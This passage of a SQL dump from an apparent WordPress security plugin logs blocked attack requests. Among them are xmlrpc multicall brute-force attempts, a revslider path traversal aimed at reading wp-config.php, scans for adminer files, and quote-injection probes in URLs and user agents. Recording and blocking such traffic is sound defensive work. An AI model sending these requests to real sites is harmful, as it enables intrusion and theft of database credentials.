£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15677,1573442559,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd%bf%27','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\nÜ}Ë86N4¹•ÐºQy\'~Ê*OèÁÜ?šìo•îËj¥ô2.\\Ç—‘\Z±\Z‰ÐÚ·:–%ÿŒÔ$J“Še;.}]Ç#“&@ÿ·- gE«^ÝæD>\0^é4æ‹ÄÖ¾9jþìoÚcù9Ä¥]ÁJÄ.þ§´˜kF]õÍ.I‘Ç³\"+ðÚú[(ªg Lï<~\rýua¢þÑrEåÑB3ÕÄ',''),(15678,1573442562,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\ne˜ËÓMÝ †‘\0Ö2å¬\'+àÔ,E~*Š‚ŠCÓêz,Û¥üöªB‚ñÎ‰T*b‰’‹¨\"2CÛ~;¡Úò§8q p6é`e;.ñ\0¦JëÛxE#Ì8¦OT˜YwÓ+',''),(15788,1573664789,'DA¥L/RZå´g$¬43','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15688,1573450258,'äÏ&Ru¡åáí¾ð®å®','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15649,1573393929,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15647,1573393924,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15648,1573393927,'Šg¬˜µÃá`ãewž½8\Z','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5193.400 QQBrowser/10.0.1066.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15795,1573681692,'‡îõÄ¦˜”°àGWúÆ;','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡\'¯A-â—:LV0ÙXˆ!',''),(15561,1573196811,'eNî9¿÷BžŸ¥ 5¹Rè','','xmlrpc',0,'SG','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15562,1573200569,'ðÅžòŽ2À#å¢l€.Úä','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','/tC™¢Üû’§Y	¼Ôp>ž%Û¥üò20œL½K–Ïm“#-#gŸ-î¸	ùÏ{ÄD’Ú',''),(15563,1573200606,'ðÅžòŽ2À#å¢l€.Úä','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','/tC™¢Üû’§Y	¼Ôp>ž%Û¥üò20œL½K–Ïm“#-#gŸ-î¸	ùÏ{ÄD’Ú',''),(15673,1573442537,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\nÜ}Ë86N4¹•ÐºQy\'~Ê*OèÁÜ?šìo•îËj¥ô2.\\Ç—‘\Z±\Z‰ÐÚ·:–%ÿŒÔ$J“Še;.}]Ç#“&@ÿ·- gE«^ÝæD>\0^é4æ‹ÄÖ¾9jþìoÚcù9Ä¥]ÁJÄ.þ§´˜kF]õÍ.I‘Ç³\"+ðÚú[(ªg Lï<~\rýua¢þÑrEåÑB3ÕÄ',''),(15674,1573442542,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd%27','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\nÜ}Ë86N4¹•ÐºQy\'~Ê*OèÁÜ?šìo•îËj¥ô2.\\Ç—‘\Z±\Z‰ÐÚ·:–%ÿŒÔ$J“Še;.}]Ç#“&@ÿ·- gE«^ÝæD>\0^é4æ‹ÄÖ¾9jþìoÚcù9Ä¥]ÁJÄ.þ§´˜kF]õÍ.I‘Ç³\"+ðÚú[(ªg Lï<~\rýua¢þÑrEåÑB3ÕÄ',''),(15675,1573442547,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd%22','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\nÜ}Ë86N4¹•ÐºQy\'~Ê*OèÁÜ?šìo•îËj¥ô2.\\Ç—‘\Z±\Z‰ÐÚ·:–%ÿŒÔ$J“Še;.}]Ç#“&@ÿ·- gE«^ÝæD>\0^é4æ‹ÄÖ¾9jþìoÚcù9Ä¥]ÁJÄ.þ§´˜kF]õÍ.I‘Ç³\"+ðÚú[(ªg Lï<~\rýua¢þÑrEåÑB3ÕÄ',''),(15676,1573442553,'šÊ…e¸ž¤Bu_ËÜ»','','xmlrpc',0,'RU','closed','GET[443]:/xmlrpc.php?rsd--','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.2495.125 Safari/537.36%bf%27','?¶ÿ“	6?‡ÇäLÇK\nÜ}Ë86N4¹•ÐºQy\'~Ê*OèÁÜ?šìo•îËj¥ô2.\\Ç—‘\Z±\Z‰ÐÚ·:–%ÿŒÔ$J“Še;.}]Ç#“&@ÿ·- gE«^ÝæD>\0^é4æ‹ÄÖ¾9jþìoÚcù9Ä¥]ÁJÄ.þ§´˜kF]õÍ.I‘Ç³\"+ðÚú[(ªg Lï<~\rýua¢þÑrEåÑB3ÕÄ',''),(15701,1573480393,'¢?ÝøœƒL(ˆ~†U¡A\n','','xmlrpc',0,'RU','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15699,1573456284,'*å4	îý:…_°HD\Zò','','xmlrpc',0,'CN','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15717,1573502990,'(;†pŽ©H‡‡Wé­Ñ','','admin',0,'RU','blocked','GET[80]:/blog/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15716,1573499439,'H8­ÔÉªIeö‡!¯ó','','admin',0,'FR','blocked','GET[80]:/www/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15711,1573490397,'Tgç³Iö¯ðÿÂ¨	ê¼','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15710,1573490393,'íd~íbëF—ÃŠç @æ.y','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15700,1573480393,'¢?ÝøœƒL(ˆ~†U¡A\n','','xmlrpc',0,'RU','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15709,1573490391,'z„#üÑÞéÊ\nD³ICút','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15707,1573490386,'ÓÓ`ñz´I· ºS\"i@·','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15708,1573490389,'z„#üÑÞéÊ\nD³ICút','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15706,1573490384,'¼ZR¤}ûëÛŒ.>Ø*jä','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15705,1573490382,'ÿ <|¬Û4 1¨©›','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15703,1573489844,'°–1ÀfÞý“ZÖZ­','','admin',0,'FR','blocked','GET[80]:/wordpress/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15704,1573490378,'gR$cò7b„½åme','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0,gzip(gfe)','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15702,1573480393,'¢?ÝøœƒL(ˆ~†U¡A\n','','xmlrpc',0,'RU','closed','POST[80]:/xmlrpc.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a','<?xml version=\"1.0\"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data><value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><dâ€¦'),(15713,1573495730,'$JW¶»8$`Ãœ©4tg­','','admin',0,'US','blocked','GET[80]:/staging/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15712,1573492669,'OÆÃå€Ù®?(ð¦Â>ÿ*','','admin',0,'DE','blocked','GET[80]:/website/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15715,1573498068,'A‹È#uê0uAÏ\nX/ÑI','','admin',0,'IL','blocked','GET[80]:/portal/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15714,1573497355,'û,>O×Ys,þ¬3\nä¶Ê>','','login',0,'GB','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15722,1573512325,'½ow°¢Üøz Vs=¬3','','admin',0,'RU','blocked','GET[80]:/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15723,1573512326,'}ÃVÖ‡É—ñ¿ˆG¨ä','','admin',0,'DE','blocked','GET[80]://wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','«ÉÓ\'Ñ”þËÇ±L·0š¸ÒÇ1c.jÕà=ÖÙË',''),(15724,1573516393,'5ãÿkç/õ}T3Bô¬‚','','admin',0,'US','blocked','GET[80]:/old/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15725,1573516536,'j-ß§—Ü]5e>§ô','','xmlrpc',0,'US','closed','GET[80]:/xmlrpc.php?rsd','?Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)?','ÍÆn8oÊ)[qoðÅœ³0',''),(15726,1573516538,'j-ß§—Ü]5e>§ô','','xmlrpc',0,'US','closed','GET[443]:/xmlrpc.php?rsd','?Mozilla/5.0 (compatible; DuckDuckBot-Https/1.1; https://duckduckgo.com/duckduckbot)?','R&äO­MšÞræ\"‰væ}',''),(15727,1573520397,'Tœäüé\\æšþí·„','','admin',0,'US','blocked','GET[80]:/1/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15728,1573521762,'¼€Ú»¦ˆ%[”è®³¼U:','','admin',0,'FR','blocked','GET[80]:/newsite/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15729,1573522237,'×¤3.Š…9]Tßœð ','','admin',0,'CN','blocked','POST[443]:/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36','¸m«,yýqËª¼,äà‹Çs*×Ïx¼±÷†NEÜÞ’zŒ´Ö÷°Û½§ul[÷Éñt­^}É/1ÍñŽrŒÎ¶|‰î‰˜·$1I :a|k2rÃãi¥àŒÍ„šLÝùõ’Þæ‰ýîÖ]ïL‰ÃÁÆXÕ“‡>¥ân˜#ÛºÇï€iö½ñ |³h$®ŠÖ®®Àˆau)_(MÅ`csÈŒ|™¹OÔ»4<•FÓæ|\0ö¿È^ß€¨®·ÐL¿€','action=onepress_plus_ajax,onepress_ajax_action,post_id'),(15730,1573523282,'N>XŸªçãÍG/ÝË|©N','','admin',0,'VN','blocked','GET[80]:/v2/wp-admin/mysql-adminer.php','Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37','®> <£ÛÑ…ªZ¥è$=<À©ªóüRwàH?âý·',''),(15731,1573524378,'’¯\ZÌäx|™xA\"\ZÉ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15732,1573524381,'¼ò`Ø?©Ïx­¹˜äJY','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15733,1573524383,'cÄS‡FKZâ2bÝ6Ú','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15734,1573524385,'íd~íbëF—ÃŠç @æ.y','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15735,1573524388,'’¯\ZÌäx|™xA\"\ZÉ','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15736,1573524390,'¤‘ôÜž*ýBgŠÇ¤B','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3409.2 Safari/537.36','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15748,1573551312,'é>}Ž§ÃKvó´ÎÇ»å§q','','login',0,'AM','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15749,1573551315,'š¤ƒdöj-íoú|7rw','','login',0,'KR','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15750,1573551320,'ÝÉ]b\"Ž+€æ¶¢!4','','login',0,'ID','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15751,1573551340,'Ì’]®Z&á#éä„à‘KZ','','login',0,'IN','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15752,1573551348,'y†ØòP>‹àµ±\nØ^','','login',0,'TH','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.95 Safari/537.36 Core/1.50.1659.400 QQBrowser/9.5.9769.400','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15753,1573563232,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15754,1573563233,'mDQDK\0öÞx=VJÏÅ','','login',0,'SG','blocked','GET[80]:/wp-login.php?action=register','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.183 Safari/537.36 Vivaldi/1.96.1147.47','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ûa!ß¹6€eK+ñòµ1‡«fÓ‡/ºq,..ò€›Ñá\r¸œ\'éØÚ^ÃÞêçt',''),(15755,1573563856,'m:´HY0?Ps˜JILÌ','','login',0,'US','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','ÍÆn8oÊ)[qoðÅœ³0',''),(15756,1573581147,'FäOž¬¤ €é«à\rîÛ‚','','login',0,'NL','blocked','GET[80]:/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','nñ8×µŒòb¯£\'MÁõ(¡à·Tªß­¢i€[a',''),(15757,1573584036,'[k•àK?–ÿfzjÅ	P','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15758,1573584038,'\n)aCqÊ>ýAÖ…C','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 Version/12.17','×ˆ3ìÐ\0Œ±Ûaîøy~Žê/öË´ñAàÛË˜Æ@¨–G:í–¶©žÕ”ã*Ônräwúß†„mHN¹~v1ll3„Â§…duŽÖ\"B',''),(15759,1573584040,'|YAºßªâÛR9ôk‹»','','login',0,'US','blocked','GET[80]:/wp-login.php?action=register','Opera/9.80 (Windows NT 6.2; Win64; x64) Presto/2.12.388 